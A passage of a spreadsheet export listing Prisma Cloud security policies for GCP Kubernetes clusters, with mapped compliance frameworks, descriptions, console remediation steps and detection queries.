          <t>Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, FFIEC, CIS Controls v8.1, Copy of New Zealand Information Security Manual (NZISM v3.4), RBI Baseline Cyber Security and Resilience Requirements, ISO 27002:2022, kfirdaus AWS Account-CS, PCI DSS v3.2.1, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, APRA (CPS 234) Information Security, CIS Controls v8, NIST SP 800-171 Revision 2, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST SP 800-172, CIS Controls v7.1, CIS Controls v7.1, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), Brazilian Data Protection Law (LGPD), NIST CSF, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B2898" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2898" s="2" t="inlineStr"/>
      <c r="D2898" t="inlineStr"/>
      <c r="E2898" t="inlineStr"/>
      <c r="F2898" t="inlineStr"/>
      <c r="G2898" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2898" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2898" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster size contains less than 3 nodes with auto upgrade enabled</t>
        </is>
      </c>
      <c r="L2898" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2898" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2898" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2898" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2898" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2898" t="inlineStr">
        <is>
          <t>CIS Control 7</t>
        </is>
      </c>
      <c r="R2898" t="inlineStr">
        <is>
          <t>7.4</t>
        </is>
      </c>
      <c r="S2898" t="inlineStr"/>
      <c r="T2898" t="b">
        <v>0</v>
      </c>
      <c r="U2898" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2898" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2898" t="inlineStr">
        <is>
          <t>Ensure your Kubernetes cluster size contains 3 or more nodes. (Clusters smaller than 3 may experience downtime during upgrades.)
This policy checks the size of your cluster pools and alerts if there are fewer than 3 nodes in a pool.</t>
        </is>
      </c>
      <c r="X2898" t="inlineStr">
        <is>
          <t>Resize your cluster.
1. Visit the Google Kubernetes Engine menu in GCP Console.
2. Click the cluster's Edit button, which looks like a pencil.
3. In the Node pools section, expand the disclosure arrow for the node pool you want to change, and change the value of the Current size field to the desired value, then click Save.
4. Repeat for each node pool as needed.
5. Click Save to exit the cluster modification screen.</t>
        </is>
      </c>
      <c r="Y2898" t="inlineStr"/>
      <c r="Z2898" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  $.nodePools[*].management.autoUpgrade is true and $.currentNodeCount less than 3</t>
        </is>
      </c>
      <c r="AA2898" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2898" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2898" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-376</t>
        </is>
      </c>
      <c r="AD2898" t="b">
        <v>1</v>
      </c>
      <c r="AE2898" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2898" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>49ca849a-73bb-44be-9d0a-1a33a2cdf398</t>
        </is>
      </c>
      <c r="AI2898" t="inlineStr">
        <is>
          <t>5d8a8cc6-64d6-4911-9e2a-bec83a8fd65f</t>
        </is>
      </c>
      <c r="AJ2898" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2898" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2899">
      <c r="A2899" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, CSA CCM v.4.0.6, NIST SP 800-172, ISO 27002:2022, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, NIST 800-53 Rev 5, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v4.0.12, CIS Controls v7.1, CSA CCM v.4.0.6, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.6, ISO 27002:2022, ISO 27001:2013, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, GDPR, CIS Controls v7.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, FFIEC, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, Copy of CIS Controls v8, ISO/IEC 27017:2015, SOC 2, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, PCI DSS v3.2.1, HIPAA, CSA CCM v.4.0.6, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Moderate), ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Copy of ACSC Information Security Manual (ISM)-clone, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, PCI DSS v4.0, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ISO 27002:2022, NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02</t>
        </is>
      </c>
      <c r="B2899" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2899" s="2" t="inlineStr"/>
      <c r="D2899" t="inlineStr"/>
      <c r="E2899" t="inlineStr"/>
      <c r="F2899" t="inlineStr"/>
      <c r="G2899" t="b">
        <v>1</v>
      </c>
      <c r="H28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899" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2899" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2899" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have HTTP load balancing disabled</t>
        </is>
      </c>
      <c r="L2899" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2899" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2899" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2899" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2899" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2899" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R2899" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S2899" t="inlineStr"/>
      <c r="T2899" t="b">
        <v>0</v>
      </c>
      <c r="U2899" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2899" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2899" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes Engine Clusters which have disabled HTTP load balancing. HTTP/HTTPS load balancing provides global load balancing for HTTP/HTTPS requests destined for your instances. Enabling HTTP/HTTPS load balancers will let the Kubernetes Engine to terminate unauthorized HTTP/HTTPS requests and make better context-aware load balancing decisions.</t>
        </is>
      </c>
      <c r="X2899" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters
4. From the list of clusters, choose the reported cluster
5. Click on EDIT button
6. Set 'HTTP load balancing' to Enabled
7. Click on Save</t>
        </is>
      </c>
      <c r="Y2899" t="inlineStr"/>
      <c r="Z2899" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'addonsConfig.httpLoadBalancing.disabled equals true'</t>
        </is>
      </c>
      <c r="AA2899" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2899" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2899" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-147</t>
        </is>
      </c>
      <c r="AD2899" t="b">
        <v>1</v>
      </c>
      <c r="AE2899" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2899" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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899" t="inlineStr">
        <is>
          <t>a3688f2e-eb5b-4b8d-b26f-90d40f08fd84</t>
        </is>
      </c>
      <c r="AI2899" t="inlineStr">
        <is>
          <t>f8e1f689-f27a-4df6-b2d8-a9a833bfe848</t>
        </is>
      </c>
      <c r="AJ2899" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2899" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2900">
      <c r="A2900" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, PCI DSS v3.2.1, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, tadenugba Copy of CIS v1.1.0 (GKE), NIST SP 800-172, CIS v1.1.0 (GKE), CIS v1.2.0 (GKE), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS v1.0.0 (GCP), ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, CIS v1.4.0 (GKE) - Level 1, SOC 2, ITSG-33, TX-RAMP Level 2, CDC NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, NIST CSF, NIST 800-53 Rev 5, SOC 2, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1, CIS v1.5.0 (GKE) - Level 1, ISO/IEC 27017:2015, NIST 800-53 Rev4, CSA CCM v.4.0.1, ISO/IEC 27002:2013, SOC 2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ITSG-33, SOC 2, ISO 27001:2013, CSA CCM v3.0.1, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, Brazilian Data Protection Law (LGPD), NIST SP 800-172, CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.3.0 (GKE) - Level 1</t>
        </is>
      </c>
      <c r="B2900" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2900" s="2" t="inlineStr"/>
      <c r="D2900" t="inlineStr"/>
      <c r="E2900" t="inlineStr"/>
      <c r="F2900" t="inlineStr"/>
      <c r="G2900" t="b">
        <v>1</v>
      </c>
      <c r="H29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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2900" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2900" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Master authorized networks disabled</t>
        </is>
      </c>
      <c r="L2900" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2900" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2900" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2900" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2900" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2900" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R2900" t="inlineStr">
        <is>
          <t>SC-7 (15)</t>
        </is>
      </c>
      <c r="S2900" t="inlineStr"/>
      <c r="T2900" t="b">
        <v>1</v>
      </c>
      <c r="U2900" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2900" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2900" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which have disabled Master authorized networks. Enabling Master authorized networks will let the Kubernetes Engine block untrusted non-GCP source IPs from accessing the Kubernetes master through HTTPS.</t>
        </is>
      </c>
      <c r="X2900" t="inlineStr">
        <is>
          <t>Follow the below link for enabling Master authorized networks feature on kubernetes clusters,
Link: https://cloud.google.com/kubernetes-engine/docs/how-to/authorized-networks#add 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-12</t>
        </is>
      </c>
      <c r="Y2900" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'container.clusters.update' permission. Successful execution will enable Master authorized network for GCP Kubernetes Engine cluster by blocking untrusted non-GCP source IPs from accessing the Kubernetes master through HTTPS.",
'impact': 'enable Master authorized network for GCP Kubernetes Engine cluster',
'cliScriptTemplate': 'gcloud container clusters update $resourceName --project=$account --zone $region --enable-master-authorized-networks'</t>
        </is>
      </c>
      <c r="Z2900" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = status equals RUNNING and masterAuthorizedNetworksConfig.enabled does not equal "true"
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2900" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2900" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2900" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-145-CKV_GCP_20</t>
        </is>
      </c>
      <c r="AD2900" t="b">
        <v>1</v>
      </c>
      <c r="AE2900" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2900" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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0" t="inlineStr">
        <is>
          <t>e1b70bb4-bb77-4326-93d5-5dd9c5170d3f</t>
        </is>
      </c>
      <c r="AI2900" t="inlineStr">
        <is>
          <t>1bf2e381-28ab-4354-9f00-920d200be18f</t>
        </is>
      </c>
      <c r="AJ2900" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2900" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2901">
      <c r="A2901" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, CIS v1.4.0 (GKE) - Level 1, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, NIST CSF, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, Fedramp (Moderate), RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Telecommunications Security Act - TSA, ISO/IEC 27002:2013, CIS v1.2.0 (GKE), NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CDC NIST 800-53 Rev4, Copy of CIS Controls v8, PCI DSS v4.0, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, CIS v1.1.0 (GKE), DORA, ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v3.2.1, Telecommunications Security Act - TSA, Risk Management in Technology (RMiT), ISO/IEC 27018:2019, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, PCI DSS v4.0, CSA CCM v.4.0.1, CIS v1.3.0 (GKE) - Level 1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, HIPAA, Secure Controls Framework (SCF) - 2024.2, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27002:2013, CIS v1.5.0 (GKE) - Level 1, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1, PCI DSS v4.0, NIST 800-53 Rev4, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2901" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2901" s="2" t="inlineStr"/>
      <c r="D2901" t="inlineStr"/>
      <c r="E2901" t="inlineStr"/>
      <c r="F2901" t="inlineStr"/>
      <c r="G2901" t="b">
        <v>1</v>
      </c>
      <c r="H29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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2901" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2901" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster Application-layer Secrets not encrypted</t>
        </is>
      </c>
      <c r="L2901" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2901" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2901" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2901" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2901" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2901" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2901" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2901" t="inlineStr"/>
      <c r="T2901" t="b">
        <v>0</v>
      </c>
      <c r="U2901" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2901" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2901" t="inlineStr">
        <is>
          <t>Application-layer Secrets Encryption provides an additional layer of security for sensitive data, such as Secrets, stored in etcd. Using this functionality, you can use a key, that you manage in Cloud KMS, to encrypt data at the application layer. This protects against attackers who gain access to an offline copy of etcd.
This policy checks your cluster for the Application-layer Secrets Encryption security feature and alerts if it is not enabled.</t>
        </is>
      </c>
      <c r="X2901" t="inlineStr">
        <is>
          <t>At this time, you cannot enable Application-layer Secrets Encryption for an existing cluster.
Creating a new cluster with Application-layer Secrets Encryption.
1. Go to the Kubernetes clusters page in the GCP Console and select CREATE CLUSTER.
2. Click Advanced options.
3. Check Enable Application-layer Secrets Encryption.
4. Select a customer-managed key from the drop down menu, or create a new KMS key.
5. When finished configuring options for the cluster, click Create.</t>
        </is>
      </c>
      <c r="Y2901" t="inlineStr"/>
      <c r="Z2901" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  $.databaseEncryption.state equals DECRYPTED</t>
        </is>
      </c>
      <c r="AA2901" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2901" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2901" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-373</t>
        </is>
      </c>
      <c r="AD2901" t="b">
        <v>1</v>
      </c>
      <c r="AE2901" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2901" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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1" t="inlineStr">
        <is>
          <t>a667d66e-899d-4b15-ab02-9de69c73dd8c</t>
        </is>
      </c>
      <c r="AI2901" t="inlineStr">
        <is>
          <t>92a3c37e-6c07-4846-bbd5-aa6a29711beb</t>
        </is>
      </c>
      <c r="AJ2901" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2901" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2902">
      <c r="A2902" t="inlineStr">
        <is>
          <t>ISO 27001:2013, RBI Baseline Cyber Security and Resilience Requirements, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST 800-53 Rev 5, PCI DSS v4.0, CIS v1.4.0 (GKE) - Level 1, NIST CSF v2.0, jbrox - GDPR, NIST CSF, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ITSG-33, NIST CSF, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, GDPR, ITSG-33, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, HITRUST CSF v.11.2.0, GDPR, CIS v1.0.0 (GCP), tadenugba Copy of CIS v1.1.0 (GKE), kfirdaus AWS Account-CS, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ISO 27001:2013, kfirdaus AWS Account-CS, TX-RAMP Level 1, SOC 2, CIS v1.5.0 (GKE) - Level 1, PCI DSS v4.0, TX-RAMP Level 2, ACSC Information Security Manual (ISM), ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, ITSG-33, CIS v1.1.0 (GKE), PCI DSS v4.0, TX-RAMP Level 2, NIST SP 800-171 Revision 3, CSA CCM v4.0.12, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, NYDFS 23 CRR-NY 500.0, NIST CSF, PCI DSS v3.2.1, NIST CSF, NIST 800-53 Rev 5, Copy of CIS Controls v8, ITSG-33, PCI DSS v4.0, PCI DSS v4.0, TX-RAMP Level 1, NIST CSF, jbrox - GDPR, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), jbrox - GDPR, FFIEC, CIS Controls v8.1, PCI DSS v4.0, PCI DSS v3.2.1, Insurance Regulatory And Development Authority Of India, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27001:2013, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, NYDFS 23 CRR-NY 500.0, PCI DSS v4.0, SOC 2, NIST CSF v2.0, HIPAA, kfirdaus AWS Account-CS, PIPEDA, Secure Controls Framework (SCF) - 2024.2, GDPR, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, SOC 2, CSA CCM v.4.0.6, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Australian Energy Sector Cyber Security Framework (AESCSF), CCPA 2018, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, NIST CSF, CIS v1.3.0 (GKE) - Level 1, Brazilian Data Protection Law (LGPD), ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v4.0, NIST 800-53 Rev4, NIST SP 800-172, TX-RAMP Level 2, ISO 27001:2013, CIS v1.2.0 (GKE)</t>
        </is>
      </c>
      <c r="B2902" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2902" s="2" t="inlineStr"/>
      <c r="D2902" t="inlineStr"/>
      <c r="E2902" t="inlineStr"/>
      <c r="F2902" t="inlineStr"/>
      <c r="G2902" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2902" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2902" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Cloud Monitoring disabled</t>
        </is>
      </c>
      <c r="L2902" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2902" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2902" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2902" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2902" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2902" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2902" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2902" t="inlineStr"/>
      <c r="T2902" t="b">
        <v>0</v>
      </c>
      <c r="U2902" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2902" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2902" t="inlineStr">
        <is>
          <t>This policy identifies Kubernetes Engine Clusters which have disabled Cloud monitoring. Enabling Cloud monitoring will let the Kubernetes Engine to monitor signals and build operations in the clusters.</t>
        </is>
      </c>
      <c r="X2902" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to 'Kubernetes Engine' (Left Panel)
3. Select 'Clusters'
4. From the list of clusters, click on the reported cluster
5. Under 'Features', click on the edit button (pencil icon) in front of 'Cloud Monitoring'
6. In the 'Edit Cloud Monitoring' dialog, enable the 'Enable Cloud Monitoring' checkbox
7. Click on 'Save Changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-3</t>
        </is>
      </c>
      <c r="Y2902" t="inlineStr"/>
      <c r="Z2902" t="inlineStr">
        <is>
